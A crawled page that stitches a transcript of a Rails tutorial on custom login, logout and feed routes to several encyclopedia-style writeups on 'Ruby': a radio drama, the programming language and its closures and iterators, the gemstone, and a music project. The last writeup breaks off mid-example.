We probably do want to define
- 8:28
whether or not we want to call it "Log In" or "Sign In,"
- 8:30
but right now I'm going to keep it inconsistent, and I will discuss it with Jason
- 8:33
and figure out exactly what we want.
- 8:35
The process is the same for changing the link,
- 8:37
so we'll just go into our application--
- 8:39
application.html.erb,
- 8:45
and what did we name that? We named it login.
- 8:47
Now we'll replace this with login_path,
- 8:52
and if we go to log in, it works.
- 8:55
Now, let's actually log in by typing in
- 8:57
my email address and my password
- 9:00
and signing in.
- 9:04
One thing we have here is our user/sign_out,
- 9:06
and we'll remember that this has to be a special delete request
- 9:10
to user/sign_out.
- 9:12
If we go to /users/sign_out
- 9:17
as a get request by simply typing it into our address bar,
- 9:20
it doesn't actually log us out.
- 9:23
We can actually go back
- 9:25
and see that we're logged in.
- 9:27
You can argue that not allowing a get request
- 9:29
for logging out makes it safer,
- 9:31
but what if we really do want to type logout?
- 9:35
We can do that because we can create our own
- 9:38
route that will go to the proper action.
- 9:41
So, the method is pretty much the same.
- 9:44
We can copy this line again,
- 9:47
[typing]
- 9:49
and it's, of course, going to be logout,
- 9:52
but instead of going to our sessions#new page,
- 9:54
we'll go to our sessions#destroy action,
- 9:57
and this is what actually logs us out.
- 9:59
We'll rename is so we can use it in our views,
- 10:01
and now that we have it saved
- 10:03
if we refresh our logout page here by going to it,
- 10:06
you'll see it actually took us,
- 10:09
signed us out, and we are now logged out.
- 10:11
You can see we now added a get path
- 10:13
that allows us to log out.
- 10:15
[typing]
- 10:19
Now, all we need to do is add it to our
- 10:21
application.html.erb.
- 10:23
We can replace destroy_user_session_path with
- 10:26
logout_path,
- 10:28
and we don't need this method: :delete.
- 10:31
In fact, it will make it not work
- 10:33
because our logout_path accepts get requests.
- 10:36
Now, if we refresh, we can test out our Log Out button,
- 10:39
and it works.
- 10:42
Everything works just as we like it.
- 10:45
We can continue this along with our edit_user_registration_path
- 10:48
and our other paths,
- 10:51
but let's take a look at a couple more things we can do
- 10:53
with routing.
- 10:55
Right now, our root path is displaying all of our statuses
- 10:58
and this is our statuses controller
- 11:00
index action.
- 11:03
If we click on All Statuses, here, we can see
- 11:05
/statuses and this is a default route that's built in
- 11:08
when we created our statuses controller.
- 11:11
If we take a look at Routes and see how that works,
- 11:13
we can see on line 11 here we have another special method called,
- 11:16
"Resources,"
- 11:18
and if we take a look at the rake routes,
- 11:20
to see what's created.
- 11:22
[typing]
- 11:24
That resources call is responsible
- 11:26
for everything under /statuses here,
- 11:29
and this allows us a nice, uniform way
- 11:32
in Rails of addressing the different actions.
- 11:35
/statuses will map to Index.
- 11:39
When we post to /statuses, like when we create our form,
- 11:42
it posts to /statuses, which is our Create action.
- 11:45
/status/new is our new page,
- 11:48
and our /id/edit is our #edit, #show, #update, and #destroy.
- 11:53
Finally, we see our root which was defined on line 12.
- 11:57
Root is a special URL which is
- 12:00
when we have nothing in our path,
- 12:02
and it defines where it should go.
- 12:04
This goes to our statuses#index.
- 12:07
What if we wanted, for instance,
- 12:09
to say when we go to /feed?
- 12:12
We would want it to display
- 12:14
all of our statuses.
- 12:16
Well, let's start up our Rails to see exactly what the error would be.
- 12:20
I'm going to reload /feed here,
- 12:22
and we get "no route matches."
- 12:25
We can do this pretty easily.
- 12:27
We want a get request to feed
- 12:30
to go to:
- 12:34
and we want it to be statuses#index for the index action,
- 12:40
and we'll call it, "as: :feed"
- 12:47
So, we can see how we can create our URLs.
- 12:49
It looks like I have an issue here.
- 12:51
Looks like I misspelled status by adding an extra S where it wasn't needed.
- 12:56
We can see that error right there.
- 12:58
It's a Routing Error and you can see by
- 13:00
simply taking the incorrect name here
- 13:03
it tried to create a "statsus" controller.
- 13:06
That tells us that we had an error
- 13:08
because we don't have a "statsus."
- 13:10
By simply fixing it,
- 13:12
by removing that extra S
- 13:14
and refreshing,
- 13:17
we realize that we actually do have to have it
- 13:19
be pluralized.
- 13:22
Those are the common errors you get when trying to create a new route.
- 13:25
Now /feed takes us to the same page
- 13:27
that /statuses would.
- 13:29
Now, if we wanted to link to that
- 13:31
of course we can go to our application here
- 13:34
instead of having our statuses_path we could have our
- 13:36
feed_path.
- 13:39
Now if we refresh, click on All Statuses,
- 13:42
it will now link us to /feed.
- 13:45
That's the basics of modifying our Routes file.
- 13:48
The get command takes a path that we want to match,
- 13:51
and we can tell it where to route to
- 13:54
with the "to:" option.
- 13:56
We can also give it a name that we can use as a named route
- 13:58
inside of our Views
- 14:00
by passing the as option
- 14:02
and the name of our route.
- 14:04
We use a special devise_scope :user
- 14:06
to correctly route based on the correct scope
- 14:10
devise_for the routes
- 14:12
that actually have to do with our Devise authentication.
- 14:15
I think we got a lot of our URLs that we want to work with right now
- 14:19
set up exactly how we want,
- 14:21
so we're at another good point.
- 14:23
We'll stop our server,
- 14:25
we'll check our status by typing "git status"
- 14:27
[typing]
- 14:29
We've modified our layout and our routes, that looks correct,
- 14:32
so we'll do git add,
- 14:34
git commit,
- 14:36
and our message is,
- 14:38
"Added custom routes for auth and feed."
- 14:45
I think that's all I want to do so before I do a push,
- 14:48
I'm going to do a git pull to make sure that there's no new code
- 14:50
from Jason. Looks like I'm good.
- 14:52
So, I can just do a
- 14:54
git push origin master,
- 14:58
and we've updated our routes code.
- 15:00
It's all pushed up to Jason,
- 15:02
and now we can continue working on our code. | https://teamtreehouse.com/library/build-a-simple-ruby-on-rails-application/designing-urls/creating-custom-routes | CC-MAIN-2017-13 | refinedweb | 3,247 | 76.96 |
Number of elements in vector
I want to implement the Gauss-Seidel method for solving linear systems for a university project, and I'm stuck on how to get the number of elements in the product vector
b = A * x. Here's my code:
def Gauss_Seidel(m, v, initial): n = v.size() <--------- prev = vector(RR, n) nex = vector(RR, n) prev = initial while abs(inf_vector_norm(nex) - inf_vector_norm(nex)) > 0.1: for i in xrange(n): s1 = sum(m[i,j] * nex[j] for j in xrange(i)) s2 = sum(m[i,j] * prev[j] for j in xrange(j+1, n+1)) nex[i] = (v[i] - s1 - s2) / m[i,i] return nex
In the code, 'm' is the input matrix, 'v' is the product of the matrix and our variable vector, and 'initial' is the starting guess for Gauss-Seidel's Method. The line pointed by that arrow is the one I'm interested in, and it's showing what I want to accomplish. I searched for it on Sage textbooks, but they are oddly silent on the matter of vectors. Any ideas? Also any other recommendations and advice on my code is more than welcome. | https://ask.sagemath.org/question/44982/number-of-elements-in-vector/ | CC-MAIN-2019-35 | refinedweb | 197 | 64.44 |
This tutorial will show you how to create and use
GateString objects, which represent an ordered sequence (or "string") of quantum gate operations. In almost all cases, you'll be using a list (or even a list of lists!) of
GateStrings, so we'll often be talking about "gate string lists". You may have noticed in Tutorial 00 that we had to generate gate string lists of "fiducials" and "germs" in order to populate the data template file which GST analyzes to produce its estimates.
A
GateString object is nearly identical, and sometimes interchangeable, with a Python tuple of gate labels (i.e. the names beginning with
G that label the gate operations in a
GateSet). They can be accessed via
.tup and
.str. The outcomes of an experiment correspond to different SPAM labels (c.f. the gate set tutorial), and so by repeating an experiment one obtains counts and thereby frequencies for each SPAM label. Given a
GateSet one can obtain corresponding probabilities by muliplying gate matrices and contracting the product between the state preparation and POVM effect vectors associated with each SPAM label. #Create spam specs which is just a tuple of two lists SpamSpec objects: one list # for preparation, the other for measurment. Each SpamSpec object associates a # fiducial gate string with a state prep (for preparation fiducials) # or a POVM effect (for measurement fiducials). In this example, since we're # just interested in the LGST strings, the state preps and POVM effects do not # enter and are irrelevant. mySpecs = pc.build_spam_specs(fiducialGateStrings=myFiducialList) lgstStrings = pc.list_lgst_gatestrings(mySpecs
As a final full-fledged example we demonstrate functions which generate gate string lists for running extended LGST (eLGST or EXLGST) and long-sequence GST (LSGST) from lists of gates, fiducials, germs, and maximum lengths. eLGST and LSGST are two different algorithms for performing Gate Set Tomography (more detail will be given on these in the Algorithms tutorial). The important different between the two for our purposes is that eLGST does not include fiducial-string prefixes or postfixes in its lists whereas LSGST does. The following example functions are very similar to
pygsti.construction.make_lsgst_lists,
pygsti.construction.make_elgst_lists, and can be copied verbatim then modified in many circumstances to provide customized gate string generation.
Both functions product a list of lists of
GateString objects. As we'll see in later tutorials, eLGST and LSGST Gate Set Tomography algorithms utilize an iterative approach whereby longer and longer gate strings are used in each successive iteration. Each list in the list-of-lists returned by these functions specifies the gate sequences to use during the corresponding iteration. Thus, each successive list contains longer gate strings. Each list is generated using a maximum length, and the list of maximum lengths,
maxLengthList below, specifies the maximum length of each list in the lists-of-lists. Thus,
maxLengthList should be an increasing list of integers (in practice, increasing by powers of two seems good) and the length of
maxLengthList determines the length of the returned list-of-lists, i.e. the number of gate string lists.
def make_ls) lsgst_list = pc.gatestring_list([ () ]) #running list of all strings so far if maxLengthList[0] == 0: lsgst_listOfLists = [ lgstStrings ] maxLengthList = maxLengthList[1:] else: lsgst_listOfLists = [ ] for maxLen in maxLengthList: lsgst_list += pc.create_gatestring_list("f0+R(germ,N)+f1", f0=fiducialList, f1=fiducialList, germ=germList, N=maxLen, R=pc.repeat_with_max_length, order=('germ','f0','f1')) lsgst_listOfLists.append( pygsti.remove_duplicates(lgstStrings + lsgst_list) ) print("%d LSGST sets w/lengths" % len(lsgst_listOfLists), map(len,lsgst_listOfLists)) return lsgst_listOfLists def make_el) elgst_list = pc.gatestring_list([ () ]) #running list of all strings so far if maxLengthList[0] == 0: elgst_listOfLists = [ singleGates ] maxLengthList = maxLengthList[1:] else: elgst_listOfLists = [ ] for maxLen in maxLengthList: elgst_list += pc.create_gatestring_list("R(germ,N)", germ=germList, N=maxLen, R=pc.repeat_with_max_length) elgst_listOfLists.append( pygsti.remove_duplicates(singleGates + elgst_list) ) print("%d eLGST sets w/lengths" % len(elgst_listOfLists),map(len,elgst_listOfLists)) return elgst_listOfLists
We'll now use these functions to generate some lists we'll use in other tutorials. To do this, we'll use
pygsti.io.write_gatestring_list to write the lists to text files with one gate string (in it's string representation) per line.
gates = ['Gi','Gx','Gy'] fiducials = pc.gatestring_list([ (), ('Gx',), ('Gy',), ('Gx','Gx'), ('Gx','Gx','Gx'), ('Gy','Gy','Gy') ]) # fiducials for 1Q MUB germs = pc.gatestring_list( [('Gx',), ('Gy',), ('Gi',), ('Gx', 'Gy',), ('Gx', 'Gy', 'Gi',), ('Gx', 'Gi', 'Gy',),('Gx', 'Gi', 'Gi',), ('Gy', 'Gi', 'Gi',), ('Gx', 'Gx', 'Gi', 'Gy',), ('Gx', 'Gy', 'Gy', 'Gi',), ('Gx', 'Gx', 'Gy', 'Gx', 'Gy', 'Gy',)] ) maxLengths = [0,1,2,4,8,16,32,64,128,256] elgst_lists = make_elgst_lists(gates, fiducials, germs, maxLengths) lsgst_lists = make_lsgst_lists(gates, fiducials, germs, maxLengths) print("\nFirst 20 items for dataset generation in label : string format") for gateString in lsgst_lists[-1][0:30]: print(str(gateString).ljust(20), ": ", tuple(gateString))
10 eLGST sets w/lengths <map object at 0x10a2329e8> 10 LSGST sets w/lengths <map object at 0x10a262f98> First 20 items for dataset generation in label : string format {} : () Gx : ('Gx',) Gy : ('Gy',) GxGx : ('Gx', 'Gx') GxGxGx : ('Gx', 'Gx', 'Gx') GyGyGy : ('Gy', 'Gy', 'Gy') GxGy : ('Gx', 'Gy') GxGxGxGx : ('Gx', 'Gx', 'Gx', 'Gx') GxGyGyGy : ('Gx', 'Gy', 'Gy', 'Gy') GyGx : ('Gy', 'Gx') GyGy : ('Gy', 'Gy') GyGxGx : ('Gy', 'Gx', 'Gx') GyGxGxGx : ('Gy', 'Gx', 'Gx', 'Gx') GyGyGyGy : ('Gy', 'Gy', 'Gy', 'Gy') GxGxGy : ('Gx', 'Gx', 'Gy') GxGxGxGxGx : ('Gx', 'Gx', 'Gx', 'Gx', 'Gx') GxGxGyGyGy : ('Gx', 'Gx', 'Gy', 'Gy', 'Gy') GxGxGxGy : ('Gx', 'Gx', 'Gx', 'Gy') GxGxGxGxGxGx : ('Gx', 'Gx', 'Gx', 'Gx', 'Gx', 'Gx') GxGxGxGyGyGy : ('Gx', 'Gx', 'Gx', 'Gy', 'Gy', 'Gy') GyGyGyGx : ('Gy', 'Gy', 'Gy', 'Gx') GyGyGyGxGx : ('Gy', 'Gy', 'Gy', 'Gx', 'Gx') GyGyGyGxGxGx : ('Gy', 'Gy', 'Gy', 'Gx', 'Gx', 'Gx') GyGyGyGyGyGy : ('Gy', 'Gy', 'Gy', 'Gy', 'Gy', 'Gy') (Gi) : ('Gi',) (Gi)Gx : ('Gi', 'Gx') (Gi)Gy : ('Gi', 'Gy') (Gi)GxGx : ('Gi', 'Gx', 'Gx') (Gi)GxGxGx : ('Gi', 'Gx', 'Gx', 'Gx') (Gi)GyGyGy : ('Gi', 'Gy', 'Gy', 'Gy')
#Write example gatestring list files for later use pygsti.io.write_gatestring_list("tutorial_files/Example_FiducialList.txt", fiducials,"#My fiducial strings") pygsti.io.write_gatestring_list("tutorial_files/Example_GermsList.txt", germs,"#My germ strings") pygsti.io.write_gatestring_list("tutorial_files/Example_GatestringList.txt",lsgst_lists[-1],"#All the gate strings to be in my dataset") pygsti.io.write_empty_dataset("tutorial_files/Example_DatasetTemplate.txt",lsgst_lists[-1]) for l,lst in zip(maxLengths,elgst_lists): pygsti.io.write_gatestring_list("tutorial_files/Example_eLGSTlist%d.txt" % l,lst, "# eLGST gate strings for max length %d" % l) for l,lst in zip(maxLengths,lsgst_lists): pygsti.io.write_gatestring_list("tutorial_files/Example_LSGSTlist%d.txt" % l,lst, "# LSGST gate strings for max length %d" % l) #Also write the max lengths we used to file import json json.dump(maxLengths, open("tutorial_files/Example_maxLengths.json","w")) | https://nbviewer.jupyter.org/github/pyGSTio/pyGSTi/blob/v0.9.3/jupyter_notebooks/Tutorials/02%20Gatestring%20lists.ipynb | CC-MAIN-2021-39 | refinedweb | 1,069 | 51.58 |
Sunday 22 January 2017
It was the best of times, it was the worst of times...
This week saw the release of three different versions of Coverage.py. This is not what I intended. Clearly something was getting tangled up. It had to do with some tricky exception handling. The story is kind of long and intricate, but has a number of chewy nuggets that fascinate me. Your mileage may vary.
Writing it all out, many of these missteps seem obvious and stupid. If you take nothing else from this, know that everyone makes mistakes, and we are all still trying to figure out the best way to solve some problems.
It started because I wanted to get the test suite running well on Jython. Jython is hard to support in Coverage.py: it can do “coverage run”, but because it doesn’t have the same internals as CPython, it can’t do “coverage report” or any of the other reporting code. Internally, there’s one place in the common reporting code where we detect this, and raise an exception. Before all the changes I’m about to describe, that code looked like this:
for attr in ['co_lnotab', 'co_firstlineno']:
if not hasattr(self.code, attr):
raise CoverageException(
"This implementation of Python doesn't support code analysis.\n"
"Run coverage.py under CPython for this command."
)
The CoverageException class is derived from Exception. Inside of Coverage.py, all exceptions raised are derived from CoverageException. This is a good practice for any library. For the coverage command-line tool, it means we can catch CoverageException at the top of main() so that we can print the message without an ugly traceback from the internals of Coverage.py.
The problem with running the test suite under Jython is that this “can’t support code analysis” exception was being raised from hundreds of tests. I wanted to get to zero failures or errors, either by making the tests pass (where the operations were supported on Jython) or skipping the tests (where the operations were unsupported).
There are lots of tests in the Coverage.py test suite that are skipped for all sorts of reasons. But I didn’t want to add decorators or conditionals to hundreds of tests for the Jython case. First, it would be a lot of noise in the tests. Second, it’s not always immediately clear from a test that it is going to touch the analysis code. Lastly and most importantly, if someday in the future I figured out how to do analysis on Jython, or if it grew the features to make the current code work, I didn’t want to have to then remove all that test-skipping noise.
So I wanted to somehow automatically skip tests when this particular exception was raised. The unittest module already has a way to do this: tests are skipped by raising a unittest.SkipTest exception. If the exception raised for “can’t support code analysis” derived from SkipTest, then the tests would be skipped automatically. Genius idea!
So in 4.3.2, the code changed to this (spread across a few files):
from coverage.backunittest import unittest
class StopEverything(unittest.SkipTest):
"""An exception that means everything should stop.
This derives from SkipTest so that tests that spring this trap will be
skipped automatically, without a lot of boilerplate all over the place.
"""
pass
class IncapablePython(CoverageException, StopEverything):
"""An operation is attempted that this version of Python cannot do."""
pass
...
# Alternative Python implementations don't always provide all the
# attributes on code objects that we need to do the analysis.
for attr in ['co_lnotab', 'co_firstlineno']:
if not hasattr(self.code, attr):
raise IncapablePython(
"This implementation of Python doesn't support code analysis.\n"
"Run coverage.py under another Python for this command."
)
It felt a little off to derive a product exception (StopEverything) from a testing exception (SkipTest), but that seemed acceptable. One place in the code, I had to deal specifically with StopEverything. In an inner loop of reporting, we catch exceptions that might happen on individual files being reported. But if this exception happens once, it will happen for all the files, so we wanted to end the report, not show this failure for every file. In pseudo-code, the loop looked like this:
for f in files_to_report:
try:
generate_report_for_file(f)
except StopEverything:
# Don't report this on single files, it's a systemic problem.
raise
except Exception as ex:
record_exception_for_file(f, ex)
This all seemed to work well: the tests skipped properly, without a ton of noise all over the place. There were no test failures in any supported environment. Ship it!
Uh-oh: very quickly, reports came in that coverage didn’t work on Python 2.6 any more. In retrospect, it was obvious: the whole point of the “from coverage.backunittest” line in the code above was because Python 2.6 doesn’t have unittest.SkipTest. For the Coverage.py tests on 2.6, I install unittest2 to get a backport of things 2.6 is missing, and that gave me SkipTest, but without my test requiements, it doesn’t exist.
So my tests passed on 2.6 because I installed a package that provided what was missing, but in the real world, unittest.SkipTest is truly missing.
This is a conundrum that I don’t have a good answer to:
How can you test your code to be sure it works properly when the testing requirements aren’t installed?
To fix the problem, I changed the definition of StopEverything. Coverage.py 4.3.3 went out the door with this:
class StopEverything(unittest.SkipTest if env.TESTING else object):
"""An exception that means everything should stop."""
pass
The env.TESTING setting was a pre-existing variable: it’s true if we are running the coverage.py test suite. This also made me uncomfortable: as soon as you start conditionalizing on whether you are running tests or not, you have a very slippery slope. In this case it seemed OK, but it wasn’t: it hid the fact that deriving an exception from object is a dumb thing to do.
So 4.3.3 failed also, and not just on Python 2.6. As soon as an exception was raised inside that reporting loop that I showed above, Python noticed that I was trying to catch a class that doesn’t derive from Exception. Of course, my test suite didn’t catch this, because when I was running my tests, my exception derived from SkipTest.
Changing “object” to “Exception” would fix the problem, but I didn’t like the test of env.TESTING anyway. So for 4.3.4, the code is:
class StopEverything(getattr(unittest, 'SkipTest', Exception)):
"""An exception that means everything should stop."""
pass
This is better, first because it uses Exception rather than object. But also, it’s duck-typing the base class rather than depending on env.TESTING.
But as I kept working on getting rid of test failures on Jython, I got to this test failure (pseudo-code):
def test_sort_report_by_invalid_option(self):
msg = "Invalid sorting option: 'Xyzzy'"
with self.assertRaisesRegex(CoverageException, msg):
coverage.report(sort='Xyzzy')
This is a reporting operation, so Jython will fail with a StopEverything exception saying, “This implementation of Python doesn’t support code analysis.” StopEverything is a CoverageException, so the assertRaisesRegex will catch it, but it will fail because the messages don’t match.
StopEverything is both a CoverageException and a SkipTest, but the SkipTest is the more important aspect. To fix the problem, I did this, but felt silly:
def test_sort_report_by_invalid_option(self):
msg = "Invalid sorting option: 'Xyzzy'"
with self.assertRaisesRegex(CoverageException, msg):
try:
coverage.report(sort='Xyzzy')
except SkipTest:
raise SkipTest()
I knew this couldn’t be the right solution. Talking it over with some co-workers (OK, I was griping and whining), we came up with the better solution. I realized that CoverageException is used in the code base to mean, “an ordinary problem from inside Coverage.py.” StopEverything is not an ordinary problem. It reminded me of typical mature exception hierarchies, where the main base class, like Exception, isn’t actually the root of the hierarchy. There are always a few special-case classes that derive from a real root higher up.
For example, in Python, the classes Exception, SystemExit, and KeyboardInterrupt all derive from BaseException. This is so “except Exception” won’t interfere with SystemExit and KeyboardInterrupt, two exceptions meant to forcefully end the program.
I needed the same thing here, for the same reason. I want to have a way to catch “all” exceptions without interfering with the exceptions that mean “end now!” I adjusted my exception hierarchy, and now the code looks like this:
class BaseCoverageException(Exception):
"""The base of all Coverage exceptions."""
pass
class CoverageException(BaseCoverageException):
"""A run-of-the-mill exception specific to coverage.py."""
pass
class StopEverything(
BaseCoverageException,
getattr(unittest, 'SkipTest', Exception)
):
"""An exception that means everything should stop."""
pass
Now I could remove the weird SkipTest dance in that test. The catch clause in my main() function changes from CoverageException to BaseCoverageException, and things work great. The end...?
One of the reasons I write this stuff down is because I’m hoping to get feedback that will improve my solution, or advance my understanding. As I lay out this story, I can imagine points of divergence: places in this narrative where a reader might object and say, “you should blah blah blah.” For example:
- “You shouldn’t bother supporting 2.6.” Perhaps not, but that doesn’t change the issues explored here, just makes them less likely.
- “You shouldn’t bother supporting Jython.” Ditto.
- “You should just have dependencies for the things you need, like unittest2.” Coverage.py has a long-standing tradition of having no dependencies. This is driven by a desire to be available to people porting to new platforms, without having to wait for the dependencies to be ported.
- “You should have more realistic integration testing.” I agree. I’m looking for ideas about how to test the scenario of having no test dependencies installed.
That’s my whole tale. Ideas are welcome.
Update: the story continues, but fair warning: metaclasses ahead!
It looks to me like the typical case of „test-induced design damage”. Code should not be burdened with test runner workarounds.
I bet that one day someone will complain about coverage making their test runner skip tests.
I think a better way is to handle this in coverage's test suite. Possible solution: wrap all your tests in a decorator that reraises with a SkipException.
@Ionel, that's an interesting point. Do you have an example of wrapping the tests that doesn't involve adding a decorator to every test or test class?
How about this:(Ronny approves :D)
For integration testing, I'm increasingly using auxiliary toxenvs which do not install test requirements and which perform a simple smoke test of one known configuration. Then you just run them alongside your toxenvs which run your test suite. We do this for e.g. permutations of our setuptools extras.
Sample:
[toxenv:cli]
deps =
commands =
pip install {toxinidir}
{envbindir}/coverage run someexample
{envbindir}/coverage html
You can get more elaborate obviously with your smoke testing, but yeah, in a basic sense, tox has worked OK for that use case.
It sounds like that in this case even the simple smoke test there would have possibly found your issue?
Wonderful write-up Ned. Thank you for taking the time to share it with us all. I can certainly relate - we ignore our gut feelings (life-data trained heuristics?) at our peril...
Big thank you!
This python coverage tool is simply great. I had a test suite for some c-python 2.7 code and i was able to produce (beautifully colored) reports in about an hour or so. THANK YOU ALL!
For Jython, I needed a little longer, but a few minutes ago I got the first meaningful coverage list.
On Windows, file path case seems to make a difference, I got zero coverage when I ran 030_src\mytool.py instead of 030_Src\mytool.py
Add a comment: | https://nedbatchelder.com/blog/201701/a_tale_of_two_exceptions.html | CC-MAIN-2018-13 | refinedweb | 2,025 | 66.44 |
ok, so i have a problem to do in java that i just can't seem to figure out. here is the problem:.
i dont have a problem with formatting the output or anything i just cant seem to figure this out.
Here's my code:
import java.util.*; public class Problem2 { public static void main(String args[]) { double dblCount = 0; double dblBalance = 0; Scanner sc = new Scanner(System.in); System.out.print("How many Balances will you be entering?: "); double dblNumber = sc.nextDouble(); do { dblCount = dblCount + 1; System.out.print("Enter a Name: "); String strName = sc.next(); System.out.print("Enter a Balance: "); double dblInput = sc.nextDouble(); if(dblInput > dblInput) { dblBalance = dblInput; } } while(dblNumber >= dblCount); System.out.println(dblBalance); } }
i'm stuck. If sombody could just point me in the right direction that would be great.
Thanks | https://www.daniweb.com/programming/software-development/threads/282419/java-coding-help-needed | CC-MAIN-2017-09 | refinedweb | 138 | 62.54 |
Ruby was a mid-80s radio drama trilogy (at least) produced by ZBS. A clever blend of sci-fi/cyberpunk and film noir styles (yes, I did say radio, but trust me, it fits).
Ruby herself is a futuristic private eye and a typical anti-hero. It’s just a bonus that she can slow time. Complete with far-reaching, sinister conspiracies and more than its fair share of femme fatales, the series covers the mainstays of film noir. Moreover, I can’t help but think of Molly whenever I think of Ruby, and her Smith-Hitatchi "Godzilla" blaster and heat seeking “deedle darts” make me drool with gadget envy.
The syntax of Ruby is somewhat like that of Pascal. It features a lot of syntactic sugar to accomodate programming the the clearest possible form. The class system is fully-OO, and does not use multiple inheritance. A method called mix-in is used to include modules in a class to define interfaces, much like the similar idea Java uses.
This is the genealogy of the programming language
Ruby:
Ruby is a child of Python, Smalltalk, Eiffel and Perl.
Ruby was born in year 1993.
It became Ruby 0.95 in year 1995.
It became Ruby 1.1 alpha 0 in year 1997.
It became Ruby 1.3.2 in year 1999.
It became Ruby 1.6.1 in year 2000, and has not changed much since that time.
This genealogy is brought to you by the Programming
Languages Genealogy Project.
Ruby and sapphire are the two varieties of the mineral corundum, that is, aluminum oxide (Al2O3). Red corundum is called ruby, and all other colors are called sapphire, but the distinction between ruby and pink or plum sapphire is so controversial that some jewelers may use Pantone color standards to distinguish them. (The name "ruby" is often a selling point for a particular gem.) They form hexagonal crystals and have a mineral hardness of 9, surpassed only by diamond in the natural world.
Large, gem-quality rubies have always been very rare. The huge gems described in medieval romances and oriental literature were most likely exaggerated by the imaginations the authors or were actually garnets or spinels.
The name ruby is derived from the Latin word for red, ruber. Ancient Orientals believed that rubies contained the spark of life, and that the ruby was self-luminous. Over the centuries, rubies have been regarded as symbols of freedom, charity, dignity and divine power. The Burmese believed that rubies ripened like fruit, and that a sapphire buried in the ground would eventually ripen into a ruby. A flawed ruby was considered "overripe".
In the Middle Ages, rubies were thought to bring good health and to guard against wicked thoughts, amorous desires and disputes. Their red color was said to cure bleeding. It was also believed that the ruby darkened in color to warn its owner of coming misfortunes, illness or death.
The first synthetic rubies were formed in 1902 by oxidizing aluminum powder in a hot gas flame, but the gems produced possessed gas bubbles and flecks of aluminum and were easy to identify. Today, it is possible to produce synthetic rubies that are indistinguishable from natural ones to all but the expert eye.
Rubies are most frequently mined in Myanmar (known for clear, deep red "pigeon's-blood" rubies), Sri Lanka (medium-light red), Thailand (dark red to brownish-red), and across Africa (purplish-red). Heat treatment can be applied to improve color and eliminate imperfections, but this typically produces solidified borax within the gem which can be spotted under magnification. Because of their association with royalty, not to mention their rarity, large fine rubies are valued higher than a colorless diamond of the same size.
Ruby is the birthstone for the month of July and is the symbolic gemstone for the 40th wedding anniversary.
One other facet to Ruby I feel would be criminal not to mention is its fully dynamic nature. Unlike Java and some other programming languages which have comparatively static object systems classes in Ruby can be modified/augmented at any time unless they're locked (or frozen in Ruby parlance). So if you want to change the way the base String class works you can just say:
class String
def initialize(...)
# New way for String to behave. Maybe implement taint
# checking?)
end
end
class String
def initialize(...)
# New way for String to behave. Maybe implement taint
# checking?)
end
end
Ruby has this concept of blocks and iterators that form the basis of many the language's looping constructs -
is in many cases objects of a specific type will define their own looping behavior.
Ruby is a hacker's dream :)
Ruby, however, is a more chilled-out electronica influenced affair compared to Rankine's previous work with comparisons to some current trip-hop artists such as Sneaker Pimps mixed with Rankine's more rock-influenced roots. The album Salt Peter was released in 1995 and the belated follow-up Short-Staffed at the Gene Pool trudged out of the corporate quagmire Rankine found herself in by 2001. Remixes of both albums have also been released.
Ed. note: Ruby is indeed the name of the side project, but not a pseudonym for Lesley Rankine. See the Ruby page on Discogs. --mkb
There is an online book available at
Main features of Ruby:
# arrays
myarray = [1, 2, 3, 4]
puts myarray[0]
# hash tables
"one" => 1,
"two" => 2,
"three" => 3,
"four" => 4,
}
puts english['one']
# regexps
if "shoenix" =~ /ni/ then
puts "ni!"
end
# defining a new class
class Shonky
def monkey
puts "monkey monkey monkey!"
end
end
shoe = Shonky.new
shoe.monkey()
# absolute value
test = -4
puts test.abs()
mylist = [1, 2, 3, 4]
# print each value in the list
mylist.each { |i|
puts i
}
# create a new anonymous function
myfunc = lambda { |num| num+1 }
puts myfunc.call(10) # 11
You can find out more in Matz' Rubycon presentation here:
One of the most beloved features of Ruby is its closure-based iterator syntax. It's been noted that this type of functionality can be replicated in some other languages, but tends not to be because the language itself makes it cumbersome. However, there is a unique magic in closures that is very hard to understand for PHP or Java programmers because those languages don't have closures, and even a lot of Perl and Javascript programmers because those languages don't emphasize closures. When I first came to Ruby I soon learned how to use its iterators, but it was several months before I actually did the mental gymnastics to learn what is the concept beneath the syntactic sugar.
First we need some brief definitions (the respective nodes have much more):
Closure: a function along with the environment (variables) in which it was defined.
Iterator: a means of looping through a collection (array, hash, etc) of some sort.
In Ruby an iterator is simply a method that somehow loops over the contents of an object. The object is often a collection type, such as Array or Hash, but an iterator can easily be defined to iterate over anything. For instance, Ruby's native File::open method can be called as an iterator where it returns one line from the file each iteration.
The magic of ruby iterators is that can call an anonymous function (known as a block in Ruby) that is passed in when the iterator is called. This block looks just like a block in many other languages. Example:
a = [ 1, 2, 3 ]
a.each { |x| print x }
would produce output:
123
So, to clarify the syntax:
a
each
{ }
|x|
print x
Other than being concise, what's so great about this syntax? How would it be any different from a traditional loop such as:
a = [ 1, 2, 3 ]
for i in 0...a.size
print a[i]
end
The iterator is a function that defines some overall semantics of an operation; like how to loop over the members of this collection, and what to return. However, by including a block the function is then infinitely customizable by the programmer. So in effect you are decoupling the overall actions to be performed on the collection (in this case: loop through it) from the actions to be performed on each individual member (in this case: print it). However there's more to it than that.
Let's look at how iterators are implemented. The Array.each method could be defined internally like this:
def each
for i in 0...size
yield(self[i])
end
end
The critical part here is the yield function. This is what calls the block that is passed in. As you can see, each is pretty straightforward. each doesn't return anything, but most other iterators do. Take find, for example:
yield
find
def find
for i in 0...size
if yield(self[i])
return self[i]
end
end
return nil
end
To continue with our previous example, you can call find like this:
a = [ 1, 2, 3 ]
if a.find { |x| x == 2 }
print "FOUND 2!"
else
print "DIDN'T FIND 2!"
end
Just to stem any confusion over how this is interpreted, note that the last value evaluated in a ruby function is automatically returned even if there is no explicit return statement. So in this case, the array items are passed to the block one by one and the expression x == 2 is evaluated and returned to the find function which returns immediately if the block returns a value that evaluates to true, or else returns nil if it gets to the end without finding such an element.
x == 2
Hopefully by now you are starting to see the utility of Ruby's block-based iterators. Certainly blocks used this way can be valuable. However, so far nothing I've shown has required closures. That is to say, we aren't using any previously defined variables in our blocks. So the block could just as well be a traditional method or function defined with a name, and passed to the iterator by reference—something you could do in PHP or Java although it wouldn't be pretty.
No, the true value of Ruby blocks come from the closure property. Consider the following example:
birthdays = ["June 10", "August 20", "December 19"]
my_birthday = database.get_my_birthday()
birthdays.find { |x| x == my_birthday }
Without closures, my_birthday would have to be a parameter passed into the block. But that would require the find method to pass two arguments in its yield statement. Even worse, find would need to have my_birthday passed into it so it could in turn pass it to the block. So we would have something like:
birthdays = ["June 10", "August 20", "December 19"]
my_birthday = database.get_my_birthday()
